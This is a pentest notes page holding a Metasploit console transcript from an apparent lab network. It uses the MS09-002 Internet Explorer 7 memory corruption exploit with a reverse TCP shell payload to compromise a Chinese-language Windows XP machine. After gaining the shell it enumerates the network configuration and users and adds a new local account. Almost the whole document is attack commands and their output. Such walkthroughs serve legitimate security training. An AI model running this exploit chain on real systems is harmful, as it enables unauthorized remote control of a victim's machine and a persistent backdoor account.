Pentest Notes - 2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7
Welcome to the Metasploit Web Console!
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 283 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9834 updated 308 days ago (2010.07.14)
Warning: This copy of the Metasploit Framework was last updated 308 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
>> use windows/browser/ms09_002_memory_corruption
>> set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
>> show options
Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP2-SP3 / Windows Vista SP0 / IE 7
>> set SRVHOST 172.16.2.100
SRVHOST => 172.16.2.100
>> set LHOST 172.16.2.100
LHOST => 172.16.2.100
>> show options
Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     172.16.2.100     yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     172.16.2.100     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP2-SP3 / Windows Vista SP0 / IE 7
>> exploit
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.2.100:4444
[*] Using URL: http://172.16.2.100:8080/9wZVWxuy
[*] Server started.
>> back
>> sessions -l
Active sessions
===============

  Id  Type   Information  Connection
  --  ----   -----------  ----------
  1   shell               172.16.2.100:4444 -> 172.16.2.120:1125
>> sessions -i 1
sessions -i 1
'sessions' 不是内部或外部命令，也不是可运行的程序
或批处理文件。
C:\Documents and Settings\Administrator.WWW-95A235B5556\桌面>
>> ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : www-95a235b5556
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter
C:\Documents and Settings\Administrator.WWW-95A235B5556\桌面>
>> net user
net user
\\WWW-95A235B5556 的用户帐户
-------------------------------------------------------------------------------
Administrator Guest HelpAssistant
SUPPORT_388945a0
命令成功完成。
C:\Documents and Settings\Administrator.WWW-95A235B5556\桌面>
>> net user shentouceshiwy /add
net user shentouceshiwy /add
命令成功完成。
C:\Documents and Settings\Administrator.WWW-95A235B5556\桌面>
>> net user
net user
\\WWW-95A235B5556 的用户帐户
-------------------------------------------------------------------------------
Administrator Guest HelpAssistant
shentouceshiwy SUPPORT_388945a0
命令成功完成。